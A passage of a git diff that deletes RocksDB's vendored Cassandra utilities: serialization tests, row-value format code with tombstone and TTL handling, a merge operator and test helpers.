-  Serialize<int32_t>(2147483647, &dest);
-  EXPECT_EQ(
-      std::string(
-          {'\x7f', '\xff', '\xff', '\xff'}),
-      dest);
-
-  dest.clear();
-  Serialize<int32_t>(-2147483648LL, &dest);
-  EXPECT_EQ(
-      std::string(
-          {'\x80', '\x00', '\x00', '\x00'}),
-      dest);
-}
-
-TEST(SerializeTest, DeserializeI32) {
-  std::string dest;
-  std::size_t offset = dest.size();
-  Serialize<int32_t>(0, &dest);
-  EXPECT_EQ(0, Deserialize<int32_t>(dest.c_str(), offset));
-
-  offset = dest.size();
-  Serialize<int32_t>(1, &dest);
-  EXPECT_EQ(1, Deserialize<int32_t>(dest.c_str(), offset));
-
-  offset = dest.size();
-  Serialize<int32_t>(-1, &dest);
-  EXPECT_EQ(-1, Deserialize<int32_t>(dest.c_str(), offset));
-
-  offset = dest.size();
-  Serialize<int32_t>(2147483647, &dest);
-  EXPECT_EQ(2147483647, Deserialize<int32_t>(dest.c_str(), offset));
-
-  offset = dest.size();
-  Serialize<int32_t>(-2147483648LL, &dest);
-  EXPECT_EQ(-2147483648LL, Deserialize<int32_t>(dest.c_str(), offset));
-}
-
-TEST(SerializeTest, SerializeI8) {
-  std::string dest;
-  Serialize<int8_t>(0, &dest);
-  EXPECT_EQ(std::string({'\x00'}), dest);
-
-  dest.clear();
-  Serialize<int8_t>(1, &dest);
-  EXPECT_EQ(std::string({'\x01'}), dest);
-
-
-  dest.clear();
-  Serialize<int8_t>(-1, &dest);
-  EXPECT_EQ(std::string({'\xff'}), dest);
-
-  dest.clear();
-  Serialize<int8_t>(127, &dest);
-  EXPECT_EQ(std::string({'\x7f'}), dest);
-
-  dest.clear();
-  Serialize<int8_t>(-128, &dest);
-  EXPECT_EQ(std::string({'\x80'}), dest);
-}
-
-TEST(SerializeTest, DeserializeI8) {
-  std::string dest;
-  std::size_t offset = dest.size();
-  Serialize<int8_t>(0, &dest);
-  EXPECT_EQ(0, Deserialize<int8_t>(dest.c_str(), offset));
-
-  offset = dest.size();
-  Serialize<int8_t>(1, &dest);
-  EXPECT_EQ(1, Deserialize<int8_t>(dest.c_str(), offset));
-
-  offset = dest.size();
-  Serialize<int8_t>(-1, &dest);
-  EXPECT_EQ(-1, Deserialize<int8_t>(dest.c_str(), offset));
-
-  offset = dest.size();
-  Serialize<int8_t>(127, &dest);
-  EXPECT_EQ(127, Deserialize<int8_t>(dest.c_str(), offset));
-
-  offset = dest.size();
-  Serialize<int8_t>(-128, &dest);
-  EXPECT_EQ(-128, Deserialize<int8_t>(dest.c_str(), offset));
-}
-
-} // namespace cassandra
-} // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/utilities/cassandra/format.cc b/thirdparty/rocksdb/utilities/cassandra/format.cc
deleted file mode 100644
index 2b096cd..0000000
--- a/thirdparty/rocksdb/utilities/cassandra/format.cc
+++ /dev/null
@@ -1,362 +0,0 @@
-// Copyright (c) 2017-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include "format.h"
-
-#include <algorithm>
-#include <map>
-#include <memory>
-
-#include "utilities/cassandra/serialize.h"
-
-namespace rocksdb {
-namespace cassandra {
-namespace {
-const int32_t kDefaultLocalDeletionTime =
-  std::numeric_limits<int32_t>::max();
-const int64_t kDefaultMarkedForDeleteAt =
-  std::numeric_limits<int64_t>::min();
-}
-
-ColumnBase::ColumnBase(int8_t mask, int8_t index)
-  : mask_(mask), index_(index) {}
-
-std::size_t ColumnBase::Size() const {
-  return sizeof(mask_) + sizeof(index_);
-}
-
-int8_t ColumnBase::Mask() const {
-  return mask_;
-}
-
-int8_t ColumnBase::Index() const {
-  return index_;
-}
-
-void ColumnBase::Serialize(std::string* dest) const {
-  rocksdb::cassandra::Serialize<int8_t>(mask_, dest);
-  rocksdb::cassandra::Serialize<int8_t>(index_, dest);
-}
-
-std::shared_ptr<ColumnBase> ColumnBase::Deserialize(const char* src,
-                                                    std::size_t offset) {
-  int8_t mask = rocksdb::cassandra::Deserialize<int8_t>(src, offset);
-  if ((mask & ColumnTypeMask::DELETION_MASK) != 0) {
-    return Tombstone::Deserialize(src, offset);
-  } else if ((mask & ColumnTypeMask::EXPIRATION_MASK) != 0) {
-    return ExpiringColumn::Deserialize(src, offset);
-  } else {
-    return Column::Deserialize(src, offset);
-  }
-}
-
-Column::Column(
-  int8_t mask,
-  int8_t index,
-  int64_t timestamp,
-  int32_t value_size,
-  const char* value
-) : ColumnBase(mask, index), timestamp_(timestamp),
-  value_size_(value_size), value_(value) {}
-
-int64_t Column::Timestamp() const {
-  return timestamp_;
-}
-
-std::size_t Column::Size() const {
-  return ColumnBase::Size() + sizeof(timestamp_) + sizeof(value_size_)
-    + value_size_;
-}
-
-void Column::Serialize(std::string* dest) const {
-  ColumnBase::Serialize(dest);
-  rocksdb::cassandra::Serialize<int64_t>(timestamp_, dest);
-  rocksdb::cassandra::Serialize<int32_t>(value_size_, dest);
-  dest->append(value_, value_size_);
-}
-
-std::shared_ptr<Column> Column::Deserialize(const char *src,
-                                            std::size_t offset) {
-  int8_t mask = rocksdb::cassandra::Deserialize<int8_t>(src, offset);
-  offset += sizeof(mask);
-  int8_t index = rocksdb::cassandra::Deserialize<int8_t>(src, offset);
-  offset += sizeof(index);
-  int64_t timestamp = rocksdb::cassandra::Deserialize<int64_t>(src, offset);
-  offset += sizeof(timestamp);
-  int32_t value_size = rocksdb::cassandra::Deserialize<int32_t>(src, offset);
-  offset += sizeof(value_size);
-  return std::make_shared<Column>(
-    mask, index, timestamp, value_size, src + offset);
-}
-
-ExpiringColumn::ExpiringColumn(
-  int8_t mask,
-  int8_t index,
-  int64_t timestamp,
-  int32_t value_size,
-  const char* value,
-  int32_t ttl
-) : Column(mask, index, timestamp, value_size, value),
-  ttl_(ttl) {}
-
-std::size_t ExpiringColumn::Size() const {
-  return Column::Size() + sizeof(ttl_);
-}
-
-void ExpiringColumn::Serialize(std::string* dest) const {
-  Column::Serialize(dest);
-  rocksdb::cassandra::Serialize<int32_t>(ttl_, dest);
-}
-
-std::chrono::time_point<std::chrono::system_clock> ExpiringColumn::TimePoint() const {
-  return std::chrono::time_point<std::chrono::system_clock>(std::chrono::microseconds(Timestamp()));
-}
-
-std::chrono::seconds ExpiringColumn::Ttl() const {
-  return std::chrono::seconds(ttl_);
-}
-
-bool ExpiringColumn::Expired() const {
-  return TimePoint() + Ttl() < std::chrono::system_clock::now();
-}
-
-std::shared_ptr<Tombstone> ExpiringColumn::ToTombstone() const {
-  auto expired_at = (TimePoint() + Ttl()).time_since_epoch();
-  int32_t local_deletion_time = static_cast<int32_t>(
-    std::chrono::duration_cast<std::chrono::seconds>(expired_at).count());
-  int64_t marked_for_delete_at =
-    std::chrono::duration_cast<std::chrono::microseconds>(expired_at).count();
-  return std::make_shared<Tombstone>(
-    ColumnTypeMask::DELETION_MASK,
-    Index(),
-    local_deletion_time,
-    marked_for_delete_at);
-}
-
-std::shared_ptr<ExpiringColumn> ExpiringColumn::Deserialize(
-    const char *src,
-    std::size_t offset) {
-  int8_t mask = rocksdb::cassandra::Deserialize<int8_t>(src, offset);
-  offset += sizeof(mask);
-  int8_t index = rocksdb::cassandra::Deserialize<int8_t>(src, offset);
-  offset += sizeof(index);
-  int64_t timestamp = rocksdb::cassandra::Deserialize<int64_t>(src, offset);
-  offset += sizeof(timestamp);
-  int32_t value_size = rocksdb::cassandra::Deserialize<int32_t>(src, offset);
-  offset += sizeof(value_size);
-  const char* value = src + offset;
-  offset += value_size;
-  int32_t ttl =  rocksdb::cassandra::Deserialize<int32_t>(src, offset);
-  return std::make_shared<ExpiringColumn>(
-    mask, index, timestamp, value_size, value, ttl);
-}
-
-Tombstone::Tombstone(
-  int8_t mask,
-  int8_t index,
-  int32_t local_deletion_time,
-  int64_t marked_for_delete_at
-) : ColumnBase(mask, index), local_deletion_time_(local_deletion_time),
-  marked_for_delete_at_(marked_for_delete_at) {}
-
-int64_t Tombstone::Timestamp() const {
-  return marked_for_delete_at_;
-}
-
-std::size_t Tombstone::Size() const {
-  return ColumnBase::Size() + sizeof(local_deletion_time_)
-    + sizeof(marked_for_delete_at_);
-}
-
-void Tombstone::Serialize(std::string* dest) const {
-  ColumnBase::Serialize(dest);
-  rocksdb::cassandra::Serialize<int32_t>(local_deletion_time_, dest);
-  rocksdb::cassandra::Serialize<int64_t>(marked_for_delete_at_, dest);
-}
-
-std::shared_ptr<Tombstone> Tombstone::Deserialize(const char *src,
-                                                  std::size_t offset) {
-  int8_t mask = rocksdb::cassandra::Deserialize<int8_t>(src, offset);
-  offset += sizeof(mask);
-  int8_t index = rocksdb::cassandra::Deserialize<int8_t>(src, offset);
-  offset += sizeof(index);
-  int32_t local_deletion_time =
-    rocksdb::cassandra::Deserialize<int32_t>(src, offset);
-  offset += sizeof(int32_t);
-  int64_t marked_for_delete_at =
-    rocksdb::cassandra::Deserialize<int64_t>(src, offset);
-  return std::make_shared<Tombstone>(
-    mask, index, local_deletion_time, marked_for_delete_at);
-}
-
-RowValue::RowValue(int32_t local_deletion_time, int64_t marked_for_delete_at)
-  : local_deletion_time_(local_deletion_time),
-  marked_for_delete_at_(marked_for_delete_at), columns_(),
-  last_modified_time_(0) {}
-
-RowValue::RowValue(Columns columns,
-                  int64_t last_modified_time)
-  : local_deletion_time_(kDefaultLocalDeletionTime),
-  marked_for_delete_at_(kDefaultMarkedForDeleteAt),
-  columns_(std::move(columns)), last_modified_time_(last_modified_time) {}
-
-std::size_t RowValue::Size() const {
-  std::size_t size = sizeof(local_deletion_time_)
-    + sizeof(marked_for_delete_at_);
-  for (const auto& column : columns_) {
-    size += column -> Size();
-  }
-  return size;
-}
-
-int64_t RowValue::LastModifiedTime() const {
-  if (IsTombstone()) {
-    return marked_for_delete_at_;
-  } else {
-    return last_modified_time_;
-  }
-}
-
-bool RowValue::IsTombstone() const {
-  return marked_for_delete_at_ > kDefaultMarkedForDeleteAt;
-}
-
-void RowValue::Serialize(std::string* dest) const {
-  rocksdb::cassandra::Serialize<int32_t>(local_deletion_time_, dest);
-  rocksdb::cassandra::Serialize<int64_t>(marked_for_delete_at_, dest);
-  for (const auto& column : columns_) {
-    column -> Serialize(dest);
-  }
-}
-
-RowValue RowValue::PurgeTtl(bool* changed) const {
-  *changed = false;
-  Columns new_columns;
-  for (auto& column : columns_) {
-    if(column->Mask() == ColumnTypeMask::EXPIRATION_MASK) {
-      std::shared_ptr<ExpiringColumn> expiring_column =
-        std::static_pointer_cast<ExpiringColumn>(column);
-
-      if(expiring_column->Expired()){
-        *changed = true;
-        continue;
-      }
-    }
-
-    new_columns.push_back(column);
-  }
-  return RowValue(std::move(new_columns), last_modified_time_);
-}
-
-RowValue RowValue::ExpireTtl(bool* changed) const {
-  *changed = false;
-  Columns new_columns;
-  for (auto& column : columns_) {
-    if(column->Mask() == ColumnTypeMask::EXPIRATION_MASK) {
-      std::shared_ptr<ExpiringColumn> expiring_column =
-        std::static_pointer_cast<ExpiringColumn>(column);
-
-      if(expiring_column->Expired()) {
-        shared_ptr<Tombstone> tombstone = expiring_column->ToTombstone();
-        new_columns.push_back(tombstone);
-        *changed = true;
-        continue;
-      }
-    }
-    new_columns.push_back(column);
-  }
-  return RowValue(std::move(new_columns), last_modified_time_);
-}
-
-bool RowValue::Empty() const {
-  return columns_.empty();
-}
-
-RowValue RowValue::Deserialize(const char *src, std::size_t size) {
-  std::size_t offset = 0;
-  assert(size >= sizeof(local_deletion_time_) + sizeof(marked_for_delete_at_));
-  int32_t local_deletion_time =
-    rocksdb::cassandra::Deserialize<int32_t>(src, offset);
-  offset += sizeof(int32_t);
-  int64_t marked_for_delete_at =
-    rocksdb::cassandra::Deserialize<int64_t>(src, offset);
-  offset += sizeof(int64_t);
-  if (offset == size) {
-    return RowValue(local_deletion_time, marked_for_delete_at);
-  }
-
-  assert(local_deletion_time == kDefaultLocalDeletionTime);
-  assert(marked_for_delete_at == kDefaultMarkedForDeleteAt);
-  Columns columns;
-  int64_t last_modified_time = 0;
-  while (offset < size) {
-    auto c = ColumnBase::Deserialize(src, offset);
-    offset += c -> Size();
-    assert(offset <= size);
-    last_modified_time = std::max(last_modified_time, c -> Timestamp());
-    columns.push_back(std::move(c));
-  }
-
-  return RowValue(std::move(columns), last_modified_time);
-}
-
-// Merge multiple row values into one.
-// For each column in rows with same index, we pick the one with latest
-// timestamp. And we also take row tombstone into consideration, by iterating
-// each row from reverse timestamp order, and stop once we hit the first
-// row tombstone.
-RowValue RowValue::Merge(std::vector<RowValue>&& values) {
-  assert(values.size() > 0);
-  if (values.size() == 1) {
-    return std::move(values[0]);
-  }
-
-  // Merge columns by their last modified time, and skip once we hit
-  // a row tombstone.
-  std::sort(values.begin(), values.end(),
-    [](const RowValue& r1, const RowValue& r2) {
-      return r1.LastModifiedTime() > r2.LastModifiedTime();
-    });
-
-  std::map<int8_t, std::shared_ptr<ColumnBase>> merged_columns;
-  int64_t tombstone_timestamp = 0;
-
-  for (auto& value : values) {
-    if (value.IsTombstone()) {
-      if (merged_columns.size() == 0) {
-        return std::move(value);
-      }
-      tombstone_timestamp = value.LastModifiedTime();
-      break;
-    }
-    for (auto& column : value.columns_) {
-      int8_t index = column->Index();
-      if (merged_columns.find(index) == merged_columns.end()) {
-        merged_columns[index] = column;
-      } else {
-        if (column->Timestamp() > merged_columns[index]->Timestamp()) {
-          merged_columns[index] = column;
-        }
-      }
-    }
-  }
-
-  int64_t last_modified_time = 0;
-  Columns columns;
-  for (auto& pair: merged_columns) {
-    // For some row, its last_modified_time > row tombstone_timestamp, but
-    // it might have rows whose timestamp is ealier than tombstone, so we
-    // ned to filter these rows.
-    if (pair.second->Timestamp() <= tombstone_timestamp) {
-      continue;
-    }
-    last_modified_time = std::max(last_modified_time, pair.second->Timestamp());
-    columns.push_back(std::move(pair.second));
-  }
-  return RowValue(std::move(columns), last_modified_time);
-}
-
-} // namepsace cassandrda
-} // namespace rocksdb
diff --git a/thirdparty/rocksdb/utilities/cassandra/format.h b/thirdparty/rocksdb/utilities/cassandra/format.h
deleted file mode 100644
index fad6df4..0000000
--- a/thirdparty/rocksdb/utilities/cassandra/format.h
+++ /dev/null
@@ -1,183 +0,0 @@
-// Copyright (c) 2017-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-/**
- * The encoding of Cassandra Row Value.
- *
- * A Cassandra Row Value could either be a row tombstone,
- * or contains multiple columns, it has following fields:
- *
- * struct row_value {
- *   int32_t local_deletion_time;  // Time in second when the row is deleted,
- *                                 // only used for Cassandra tombstone gc.
- *   int64_t marked_for_delete_at; // Ms that marked this row is deleted.
- *   struct column_base columns[]; // For non tombstone row, all columns
- *                                 // are stored here.
- * }
- *
- * If the local_deletion_time and marked_for_delete_at is set, then this is
- * a tombstone, otherwise it contains multiple columns.
- *
- * There are three type of Columns: Normal Column, Expiring Column and Column
- * Tombstone, which have following fields:
- *
- * // Identify the type of the column.
- * enum mask {
- *   DELETION_MASK = 0x01,
- *   EXPIRATION_MASK = 0x02,
- * };
- *
- * struct column  {
- *   int8_t mask = 0;
- *   int8_t index;
- *   int64_t timestamp;
- *   int32_t value_length;
- *   char value[value_length];
- * }
- *
- * struct expiring_column  {
- *   int8_t mask = mask.EXPIRATION_MASK;
- *   int8_t index;
- *   int64_t timestamp;
- *   int32_t value_length;
- *   char value[value_length];
- *   int32_t ttl;
- * }
- *
- * struct tombstone_column  {
- *   int8_t mask = mask.DELETION_MASK;
- *   int8_t index;
- *   int32_t local_deletion_time; // Similar to row_value's field.
- *   int64_t marked_for_delete_at;
- *  }
- */
-
-#pragma once
-#include <chrono>
-#include <vector>
-#include <memory>
-#include "rocksdb/merge_operator.h"
-#include "rocksdb/slice.h"
-#include "util/testharness.h"
-
-namespace rocksdb {
-namespace cassandra {
-
-// Identify the type of the column.
-enum ColumnTypeMask {
-  DELETION_MASK = 0x01,
-  EXPIRATION_MASK = 0x02,
-};
-
-
-class ColumnBase {
-public:
-  ColumnBase(int8_t mask, int8_t index);
-  virtual ~ColumnBase() = default;
-
-  virtual int64_t Timestamp() const = 0;
-  virtual int8_t Mask() const;
-  virtual int8_t Index() const;
-  virtual std::size_t Size() const;
-  virtual void Serialize(std::string* dest) const;
-  static std::shared_ptr<ColumnBase> Deserialize(const char* src,
-                                                 std::size_t offset);
-
-private:
-  int8_t mask_;
-  int8_t index_;
-};
-
-class Column : public ColumnBase {
-public:
-  Column(int8_t mask, int8_t index, int64_t timestamp,
-    int32_t value_size, const char* value);
-
-  virtual int64_t Timestamp() const override;
-  virtual std::size_t Size() const override;
-  virtual void Serialize(std::string* dest) const override;
-  static std::shared_ptr<Column> Deserialize(const char* src,
-                                             std::size_t offset);
-
-private:
-  int64_t timestamp_;
-  int32_t value_size_;
-  const char* value_;
-};
-
-class Tombstone : public ColumnBase {
-public:
-  Tombstone(int8_t mask, int8_t index,
-    int32_t local_deletion_time, int64_t marked_for_delete_at);
-
-  virtual int64_t Timestamp() const override;
-  virtual std::size_t Size() const override;
-  virtual void Serialize(std::string* dest) const override;
-
-  static std::shared_ptr<Tombstone> Deserialize(const char* src,
-                                                std::size_t offset);
-
-private:
-  int32_t local_deletion_time_;
-  int64_t marked_for_delete_at_;
-};
-
-class ExpiringColumn : public Column {
-public:
-  ExpiringColumn(int8_t mask, int8_t index, int64_t timestamp,
-    int32_t value_size, const char* value, int32_t ttl);
-
-  virtual std::size_t Size() const override;
-  virtual void Serialize(std::string* dest) const override;
-  bool Expired() const;
-  std::shared_ptr<Tombstone> ToTombstone() const;
-
-  static std::shared_ptr<ExpiringColumn> Deserialize(const char* src,
-                                                     std::size_t offset);
-
-private:
-  int32_t ttl_;
-  std::chrono::time_point<std::chrono::system_clock> TimePoint() const;
-  std::chrono::seconds Ttl() const;
-};
-
-typedef std::vector<std::shared_ptr<ColumnBase>> Columns;
-
-class RowValue {
-public:
-  // Create a Row Tombstone.
-  RowValue(int32_t local_deletion_time, int64_t marked_for_delete_at);
-  // Create a Row containing columns.
-  RowValue(Columns columns,
-           int64_t last_modified_time);
-  RowValue(const RowValue& that) = delete;
-  RowValue(RowValue&& that) noexcept = default;
-  RowValue& operator=(const RowValue& that) = delete;
-  RowValue& operator=(RowValue&& that) = default;
-
-  std::size_t Size() const;;
-  bool IsTombstone() const;
-  // For Tombstone this returns the marked_for_delete_at_,
-  // otherwise it returns the max timestamp of containing columns.
-  int64_t LastModifiedTime() const;
-  void Serialize(std::string* dest) const;
-  RowValue PurgeTtl(bool* changed) const;
-  RowValue ExpireTtl(bool* changed) const;
-  bool Empty() const;
-
-  static RowValue Deserialize(const char* src, std::size_t size);
-  // Merge multiple rows according to their timestamp.
-  static RowValue Merge(std::vector<RowValue>&& values);
-
-private:
-  int32_t local_deletion_time_;
-  int64_t marked_for_delete_at_;
-  Columns columns_;
-  int64_t last_modified_time_;
-
-};
-
-} // namepsace cassandrda
-} // namespace rocksdb
diff --git a/thirdparty/rocksdb/utilities/cassandra/merge_operator.cc b/thirdparty/rocksdb/utilities/cassandra/merge_operator.cc
deleted file mode 100644
index 715ef85..0000000
--- a/thirdparty/rocksdb/utilities/cassandra/merge_operator.cc
+++ /dev/null
@@ -1,80 +0,0 @@
-//  Copyright (c) 2017-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include "merge_operator.h"
-
-#include <memory>
-#include <assert.h>
-
-#include "rocksdb/slice.h"
-#include "rocksdb/merge_operator.h"
-#include "utilities/merge_operators.h"
-#include "utilities/cassandra/format.h"
-
-namespace rocksdb {
-namespace cassandra {
-
-// Implementation for the merge operation (merges two Cassandra values)
-bool CassandraValueMergeOperator::FullMergeV2(
-    const MergeOperationInput& merge_in,
-    MergeOperationOutput* merge_out) const {
-  // Clear the *new_value for writing.
-  merge_out->new_value.clear();
-
-  if (merge_in.existing_value == nullptr && merge_in.operand_list.size() == 1) {
-    // Only one operand
-    merge_out->existing_operand = merge_in.operand_list.back();
-    return true;
-  }
-
-  std::vector<RowValue> row_values;
-  if (merge_in.existing_value) {
-    row_values.push_back(
-      RowValue::Deserialize(merge_in.existing_value->data(),
-                            merge_in.existing_value->size()));
-  }
-
-  for (auto& operand : merge_in.operand_list) {
-    row_values.push_back(RowValue::Deserialize(operand.data(), operand.size()));
-  }
-
-  RowValue merged = RowValue::Merge(std::move(row_values));
-  merge_out->new_value.reserve(merged.Size());
-  merged.Serialize(&(merge_out->new_value));
-
-  return true;
-}
-
-bool CassandraValueMergeOperator::PartialMergeMulti(
-    const Slice& key,
-    const std::deque<Slice>& operand_list,
-    std::string* new_value,
-    Logger* logger) const {
-  // Clear the *new_value for writing.
-  assert(new_value);
-  new_value->clear();
-
-  std::vector<RowValue> row_values;
-  for (auto& operand : operand_list) {
-    row_values.push_back(RowValue::Deserialize(operand.data(), operand.size()));
-  }
-  RowValue merged = RowValue::Merge(std::move(row_values));
-  new_value->reserve(merged.Size());
-  merged.Serialize(new_value);
-  return true;
-}
-
-const char* CassandraValueMergeOperator::Name() const  {
-  return "CassandraValueMergeOperator";
-}
-
-} // namespace cassandra
-
-std::shared_ptr<MergeOperator>
-    MergeOperators::CreateCassandraMergeOperator() {
-  return std::make_shared<rocksdb::cassandra::CassandraValueMergeOperator>();
-}
-
-} // namespace rocksdb
diff --git a/thirdparty/rocksdb/utilities/cassandra/merge_operator.h b/thirdparty/rocksdb/utilities/cassandra/merge_operator.h
deleted file mode 100644
index 28066ca..0000000
--- a/thirdparty/rocksdb/utilities/cassandra/merge_operator.h
+++ /dev/null
@@ -1,33 +0,0 @@
-//  Copyright (c) 2017-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-#include "rocksdb/merge_operator.h"
-#include "rocksdb/slice.h"
-
-namespace rocksdb {
-namespace cassandra {
-
-/**
- * A MergeOperator for rocksdb that implements Cassandra row value merge.
- */
-class CassandraValueMergeOperator : public MergeOperator {
-public:
-  static std::shared_ptr<MergeOperator> CreateSharedInstance();
-
-  virtual bool FullMergeV2(const MergeOperationInput& merge_in,
-                           MergeOperationOutput* merge_out) const override;
-
-  virtual bool PartialMergeMulti(const Slice& key,
-                                 const std::deque<Slice>& operand_list,
-                                 std::string* new_value,
-                                 Logger* logger) const override;
-
-  virtual const char* Name() const override;
-
-  virtual bool AllowSingleOperand() const override { return true; }
-};
-} // namespace cassandra
-} // namespace rocksdb
diff --git a/thirdparty/rocksdb/utilities/cassandra/serialize.h b/thirdparty/rocksdb/utilities/cassandra/serialize.h
deleted file mode 100644
index 64ccd4c..0000000
--- a/thirdparty/rocksdb/utilities/cassandra/serialize.h
+++ /dev/null
@@ -1,75 +0,0 @@
-//  Copyright (c) 2017-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-/**
- * Helper functions which serialize and deserialize integers
- * into bytes in big endian.
- */
-
-#pragma once
-
-namespace rocksdb {
-namespace cassandra {
-namespace {
-const int64_t kCharMask = 0xFFLL;
-const int32_t kBitsPerByte = 8;
-}
-
-template<typename T>
-void Serialize(T val, std::string* dest);
-
-template<typename T>
-T Deserialize(const char* src, std::size_t offset=0);
-
-// Specializations
-template<>
-inline void Serialize<int8_t>(int8_t t, std::string* dest) {
-  dest->append(1, static_cast<char>(t & kCharMask));
-}
-
-template<>
-inline void Serialize<int32_t>(int32_t t, std::string* dest) {
-  for (unsigned long i = 0; i < sizeof(int32_t); i++) {
-     dest->append(1, static_cast<char>(
-       (t >> (sizeof(int32_t) - 1 - i) * kBitsPerByte) & kCharMask));
-  }
-}
-
-template<>
-inline void Serialize<int64_t>(int64_t t, std::string* dest) {
-  for (unsigned long i = 0; i < sizeof(int64_t); i++) {
-     dest->append(
-       1, static_cast<char>(
-         (t >> (sizeof(int64_t) - 1 - i) * kBitsPerByte) & kCharMask));
-  }
-}
-
-template<>
-inline int8_t Deserialize<int8_t>(const char* src, std::size_t offset) {
-  return static_cast<int8_t>(src[offset]);
-}
-
-template<>
-inline int32_t Deserialize<int32_t>(const char* src, std::size_t offset) {
-  int32_t result = 0;
-  for (unsigned long i = 0; i < sizeof(int32_t); i++) {
-    result |= static_cast<int32_t>(static_cast<unsigned char>(src[offset + i]))
-        << ((sizeof(int32_t) - 1 - i) * kBitsPerByte);
-  }
-  return result;
-}
-
-template<>
-inline int64_t Deserialize<int64_t>(const char* src, std::size_t offset) {
-  int64_t result = 0;
-  for (unsigned long i = 0; i < sizeof(int64_t); i++) {
-    result |= static_cast<int64_t>(static_cast<unsigned char>(src[offset + i]))
-        << ((sizeof(int64_t) - 1 - i) * kBitsPerByte);
-  }
-  return result;
-}
-
-} // namepsace cassandrda
-} // namespace rocksdb
diff --git a/thirdparty/rocksdb/utilities/cassandra/test_utils.cc b/thirdparty/rocksdb/utilities/cassandra/test_utils.cc
deleted file mode 100644
index 61f53b2..0000000
--- a/thirdparty/rocksdb/utilities/cassandra/test_utils.cc
+++ /dev/null
@@ -1,67 +0,0 @@
-//  Copyright (c) 2017-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include "test_utils.h"
-
-namespace rocksdb {
-namespace cassandra {
-const char kData[] = {'d', 'a', 't', 'a'};
-const char kExpiringData[] = {'e', 'd', 'a', 't', 'a'};
-const int32_t kLocalDeletionTime = 1;
-const int32_t kTtl = 86400;
-const int8_t kColumn = 0;
-const int8_t kTombstone = 1;
-const int8_t kExpiringColumn = 2;
-
-std::shared_ptr<ColumnBase> CreateTestColumn(int8_t mask,
-                                             int8_t index,
-                                             int64_t timestamp) {
-  if ((mask & ColumnTypeMask::DELETION_MASK) != 0) {
-    return std::shared_ptr<Tombstone>(new Tombstone(
-      mask, index, kLocalDeletionTime, timestamp));
-  } else if ((mask & ColumnTypeMask::EXPIRATION_MASK) != 0) {
-    return std::shared_ptr<ExpiringColumn>(new ExpiringColumn(
-      mask, index, timestamp, sizeof(kExpiringData), kExpiringData, kTtl));
-  } else {
-    return std::shared_ptr<Column>(
-      new Column(mask, index, timestamp, sizeof(kData), kData));
-  }
-}
-
-RowValue CreateTestRowValue(
-    std::vector<std::tuple<int8_t, int8_t, int64_t>> column_specs) {
-  std::vector<std::shared_ptr<ColumnBase>> columns;
-  int64_t last_modified_time = 0;
-  for (auto spec: column_specs) {
-    auto c = CreateTestColumn(std::get<0>(spec), std::get<1>(spec),
-                              std::get<2>(spec));
-    last_modified_time = std::max(last_modified_time, c -> Timestamp());
-    columns.push_back(std::move(c));
-  }
-  return RowValue(std::move(columns), last_modified_time);
-}
-
-RowValue CreateRowTombstone(int64_t timestamp) {
-  return RowValue(kLocalDeletionTime, timestamp);
-}
-
-void VerifyRowValueColumns(
-  std::vector<std::shared_ptr<ColumnBase>> &columns,
-  std::size_t index_of_vector,
-  int8_t expected_mask,
-  int8_t expected_index,
-  int64_t expected_timestamp
-) {
-  EXPECT_EQ(expected_timestamp, columns[index_of_vector]->Timestamp());
-  EXPECT_EQ(expected_mask, columns[index_of_vector]->Mask());
-  EXPECT_EQ(expected_index, columns[index_of_vector]->Index());
-}
-
-int64_t ToMicroSeconds(int64_t seconds) {
-  return seconds * (int64_t)1000000;
-}
-
-}
-}
diff --git a/thirdparty/rocksdb/utilities/cassandra/test_utils.h b/thirdparty/rocksdb/utilities/cassandra/test_utils.h
deleted file mode 100644
index 463b12b..0000000
--- a/thirdparty/rocksdb/utilities/cassandra/test_utils.h
+++ /dev/null
@@ -1,43 +0,0 @@
-//  Copyright (c) 2017-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-#include <memory>
-#include "util/testharness.h"
-#include "utilities/cassandra/format.h"
-#include "utilities/cassandra/serialize.h"
-
-namespace rocksdb {
-namespace cassandra {
-extern const char kData[];
-extern const char kExpiringData[];
-extern const int32_t kLocalDeletionTime;
-extern const int32_t kTtl;
-extern const int8_t kColumn;
-extern const int8_t kTombstone;
-extern const int8_t kExpiringColumn;
-
-
-std::shared_ptr<ColumnBase> CreateTestColumn(int8_t mask,
-                                             int8_t index,
-                                             int64_t timestamp);
-
-RowValue CreateTestRowValue(
-    std::vector<std::tuple<int8_t, int8_t, int64_t>> column_specs);
-
-RowValue CreateRowTombstone(int64_t timestamp);
-
-void VerifyRowValueColumns(
-  std::vector<std::shared_ptr<ColumnBase>> &columns,
-  std::size_t index_of_vector,
-  int8_t expected_mask,
-  int8_t expected_index,
-  int64_t expected_timestamp
-);
-
-int64_t ToMicroSeconds(int64_t seconds);
-
-}
-}
diff --git a/thirdparty/rocksdb/utilities/checkpoint/checkpoint_impl.cc b/thirdparty/rocksdb/utilities/checkpoint/checkpoint_impl.cc
deleted file mode 100644
index 0cdddbd..0000000
--- a/thirdparty/rocksdb/utilities/checkpoint/checkpoint_impl.cc
+++ /dev/null
@@ -1,304 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
